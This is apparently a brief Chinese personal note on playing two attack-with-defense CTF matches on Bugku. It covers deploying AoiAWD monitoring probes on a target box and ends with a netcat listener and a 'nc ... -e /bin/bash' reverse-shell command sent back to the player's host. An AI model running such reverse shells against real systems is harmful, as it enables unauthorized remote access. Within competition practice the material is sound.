AWD记录

bugku上打了两场awd,简单记录一下
winscp连上方便文件操作,tabby再开个ssh

Aoiawd上探针,将本机tmp文件夹里面探针扔到靶机上然后执行指令

chmod +x tapeworm.phar
chmod +x roundworm
chmod +x guardian.phar
./tapeworm.phar -d 目录 -s ip:port
./roundworm  -w 目录 -s ip -p port
./guardian.phar -i 目录 -s ip:port
通常
./tapeworm.phar -d ../var/www/html -s ip:port
./roundworm  -w ../var/www/html -s ip -p port

docker里面构建的Aoiawd的guardian用起来有点问题,一般情况evilPatcher能应付一下
搭建好后可以看记录,可以粗略判断危险处

主机开启端口监听:

nc -lvvp 2333

靶机反弹shell,已经拿道远端shell

nc 主机ip 2333 -e /bin/bash